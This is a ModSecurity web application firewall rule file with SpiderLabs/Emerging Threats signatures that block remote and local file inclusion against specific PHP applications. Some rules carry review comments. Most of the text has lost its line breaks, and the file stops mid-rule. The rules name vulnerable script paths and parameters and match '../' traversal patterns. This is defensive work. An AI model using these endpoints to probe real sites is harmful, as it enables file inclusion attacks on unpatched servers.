"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009756,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Clickheat main.php mosConfig_absolute_path Parameter Remote File Inclusion - 2',tag:'web-application-attack',tag:'bugtraq,32190'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:mosConfig_absolute_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Clickheat main.php mosConfig_absolute_path Parameter Remote File Inclusion - 2',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009757) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Clickheat Cache.php mosConfig_absolute_path Remote File Inclusion SecRule REQUEST_LINE "@contains /Clickheat/Cache.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009757,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Clickheat Cache.php mosConfig_absolute_path 
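Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,32190'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    # The TX selector between the slashes is a regular expression. Unescaped,
    # "[mosConfig_absolute_path]" is a character class, so the selector would
    # not match the literal name "GLOBALS[mosConfig_absolute_path]" and this
    # chain could not fire for it. The brackets are escaped to match literally.
    # NOTE(review): confirm with a regression test against your build.
    SecRule &TX:'/RFI.*ARGS:GLOBALS\[mosConfig_absolute_path\]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Clickheat Cache.php mosConfig_absolute_path Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2009758) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Clickheat Clickheat_Heatmap.php mosConfig_absolute_path Remote File Inclusion
# Chain: request line contains the script path, the method is GET, and at
# least one TX variable exists whose name matches the RFI selector below.
# Brackets are escaped so "GLOBALS[mosConfig_absolute_path]" is matched
# literally rather than as a regex character class.
SecRule REQUEST_LINE "@contains /Clickheat_Heatmap.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009758,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Clickheat Clickheat_Heatmap.php mosConfig_absolute_path Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,32190'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/RFI.*ARGS:GLOBALS\[mosConfig_absolute_path\]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Clickheat Clickheat_Heatmap.php mosConfig_absolute_path Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2009759) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Clickheat GlobalVariables.php mosConfig_absolute_path Remote File Inclusion - 1
# Same chain shape as the rule above; the brackets in the TX selector are
# escaped for the same reason.
SecRule REQUEST_LINE "@contains /GlobalVariables.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009759,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Clickheat GlobalVariables.php mosConfig_absolute_path Remote File Inclusion - 1',tag:'web-application-attack',tag:'bugtraq,32190'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/RFI.*ARGS:GLOBALS\[mosConfig_absolute_path\]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS 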
Clickheat GlobalVariables.php mosConfig_absolute_path Remote File Inclusion - 1',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009760) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Clickheat main.php mosConfig_absolute_path Parameter Remote File Inclusion -2 SecRule REQUEST_LINE "@contains /overview/main.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009760,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Clickheat main.php mosConfig_absolute_path Parameter Remote File Inclusion -2',tag:'web-application-attack',tag:'bugtraq,32190'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:mosConfig_absolute_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Clickheat main.php mosConfig_absolute_path Parameter Remote File Inclusion -2',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009166) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Concord Consortium CoAST header.php sections_file parameter remote file inclusion SecRule REQUEST_LINE "@contains /header.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009166,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Concord Consortium CoAST header.php sections_file parameter remote file inclusion',tag:'web-application-attack',tag:'bugtraq,31461'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:sections_file/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Concord Consortium CoAST header.php sections_file parameter remote file inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009793) SpiderLabs Research (SLR) Public Vulns: ET 
WEB_SPECIFIC_APPS PHP Crawler footer.php footer_file Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /footer.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009793,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS PHP Crawler footer.php footer_file Parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,31217'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:footer_file/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHP Crawler footer.php footer_file Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009764) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Cyberfolio css.php theme Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /portfolio/css.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009764,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Cyberfolio css.php theme Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,32218'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:theme "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Cyberfolio css.php theme Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010025) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS DM Albums album.php SECURITY_FILE Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /dm-albums/template/album.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010025,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS DM Albums album.php SECURITY_FILE Parameter Local File 
Inclusion',tag:'web-application-attack',tag:'bugtraq,35521'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:SECURITY_FILE "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS DM Albums album.php SECURITY_FILE Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010027) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS DM Albums album.php SECURITY_FILE Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /dm-albums/template/album.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010027,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS DM Albums album.php SECURITY_FILE Parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,35521'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:SECURITY_FILE/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS DM Albums album.php SECURITY_FILE Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011099) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS DaFun Spirit lgsl_players.php lgsl_path Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /modules/dfss/lgsl/lgsl_players.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011099,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS DaFun Spirit lgsl_players.php lgsl_path Parameter Remote File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:lgsl_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS DaFun Spirit lgsl_players.php lgsl_path Parameter Remote File 
Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011100) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS DaFun Spirit lgsl_settings.php lgsl_path Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /modules/dfss/lgsl/lgsl_settings.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011100,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS DaFun Spirit lgsl_settings.php lgsl_path Parameter Remote File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:lgsl_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS DaFun Spirit lgsl_settings.php lgsl_path Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010252) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Datalife Engine api.class.php dle_config_api Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /engine/api/api.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010252,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Datalife Engine api.class.php dle_config_api Parameter Remote File Inclusion',tag:'web-application-attack',tag:'url,www.juniper.net/security/auto/vulnerabilities/vuln36212.html'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:dle_config_api/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Datalife Engine api.class.php dle_config_api Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009324) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Demium CMS urheber.php name 
Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /urheber.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009324,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Demium CMS urheber.php name Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,33933'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:name "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Demium CMS urheber.php name Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009317) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS DesktopOnNet don3_requiem.php app_path Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /don3_requiem.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009317,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS DesktopOnNet don3_requiem.php app_path Parameter Remote File Inclusion',tag:'web-application-attack',tag:'cve,2008-2649'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:app_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS DesktopOnNet don3_requiem.php app_path Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009318) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS DesktopOnNet frontpage.php app_path Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /frontpage.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009318,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS DesktopOnNet frontpage.php app_path Parameter Remote File Inclusion',tag:'web-application-attack',tag:'cve,2008-2649'" SecRule 
REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:app_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS DesktopOnNet frontpage.php app_path Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009876) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Dokuwiki doku.php config_cascade Local File Inclusion SecRule REQUEST_LINE "@contains /doku.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009876,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Dokuwiki doku.php config_cascade Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,35095'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:config_cascade[main][default][] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Dokuwiki doku.php config_cascade Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009848) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Dragoon header.inc.php root Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /includes/header.inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009848,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Dragoon header.inc.php root Parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,28660'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:root/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Dragoon header.inc.php root Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010707) SpiderLabs Research (SLR) Public Vulns: ET 
WEB_SPECIFIC_APPS Dros core.write_compiled_include.php smarty Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /include/libs/internals/core.write_compiled_include.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010707,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Dros core.write_compiled_include.php smarty Remote File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/10682'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:smarty/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Dros core.write_compiled_include.php smarty Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010708) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Dros core.process_compiled_include.php smarty Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /include/libs/internals/core.process_compiled_include.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010708,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Dros core.process_compiled_include.php smarty Remote File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/10682'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:smarty/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Dros core.process_compiled_include.php smarty Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010709) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Dros function.config_load.php _compile_file Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /include/libs/plugins/function.config_load.php" 
"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010709,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Dros function.config_load.php _compile_file Remote File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/10682'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:_compile_file/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Dros function.config_load.php _compile_file Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003679) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS DynamicPAD Remote Inclusion Attempt -- dp_logs.php HomeDir SecRule REQUEST_LINE "@contains /dp_logs.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003679,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS DynamicPAD Remote Inclusion Attempt -- dp_logs.php HomeDir',tag:'web-application-attack',tag:'cve,CVE-2007-2527'" SecRule &TX:'/RFI.*ARGS:HomeDir/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS DynamicPAD Remote Inclusion Attempt -- dp_logs.php HomeDir',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003680) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS DynamicPAD Remote Inclusion Attempt -- index.php HomeDir SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003680,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS DynamicPAD Remote Inclusion Attempt -- index.php HomeDir',tag:'web-application-attack',tag:'cve,CVE-2007-2527'" SecRule &TX:'/RFI.*ARGS:HomeDir/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS DynamicPAD Remote 
Inclusion Attempt -- index.php HomeDir',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003682) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS E-Gads Remote Inclusion Attempt -- common.php locale SecRule REQUEST_LINE "@contains /common.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003682,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS E-Gads Remote Inclusion Attempt -- common.php locale',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3846'" SecRule &TX:'/RFI.*ARGS:locale/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS E-Gads Remote Inclusion Attempt -- common.php locale',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011725) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS EZPX photoblog tpl_base_dir Parameter Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /application/views/public/commentform.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011725,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS EZPX photoblog tpl_base_dir Parameter Remote File Inclusion Attempt',tag:'web-application-attack',tag:'bugtraq,40881'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:tpl_base_dir/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS EZPX photoblog tpl_base_dir Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2008832) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Enthusiast path parameter Local File Inclusion SecRule REQUEST_LINE "@contains /show_joined.php" 
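"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008832,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Enthusiast path parameter Local File Inclusion',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    # This rule is labelled Local File Inclusion, but its last condition was
    # the same RFI TX-variable check used by rule 2008833, so the two rules
    # had identical conditions and a "../" traversal in "path" was not checked
    # here. It now tests the argument for "../", as the other LFI rules in
    # this file do.
    # NOTE(review): confirm against the upstream ET signature for 2008832.
    SecRule ARGS:path "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Enthusiast path parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2008833) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Enthusiast path parameter Remote File Inclusion
# Chain: request line contains the script path, the method is GET, and at
# least one TX variable exists whose name matches the RFI selector below.
# The selector is not anchored at the end, so it also matches TX keys for
# argument names that merely begin with "path".
SecRule REQUEST_LINE "@contains /show_joined.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008833,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Enthusiast path parameter Remote File Inclusion',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/RFI.*ARGS:path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Enthusiast path parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2009428) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ExBB threadstop.php exbb Parameter Local File Inclusion
# Chain: request line contains the script path, the method is GET, and the
# exbb[default_lang] argument contains "../". The argument name here is a
# literal selector, not a regex, so its brackets need no escaping.
SecRule REQUEST_LINE "@contains /threadstop/threadstop.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009428,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS ExBB threadstop.php exbb Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,28686'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:exbb[default_lang] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ExBB threadstop.php exbb Parameter Local File 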
Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010800) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS F5 Data Manager DiagLogListActionBody.do Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /acopia/manager/DiagLogListActionBody.do" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010800,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS F5 Data Manager DiagLogListActionBody.do Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:logFile "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS F5 Data Manager DiagLogListActionBody.do Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010801) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS F5 Data Manager DiagCaptureFileListActionBody.do Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /acopia/manager/DiagCaptureFileListActionBody.do" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010801,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS F5 Data Manager DiagCaptureFileListActionBody.do Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:captureFile "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS F5 Data Manager DiagCaptureFileListActionBody.do Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010802) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS F5 Data Manager ViewSatReport.do Local File Inclusion Attempt SecRule REQUEST_LINE "@contains 
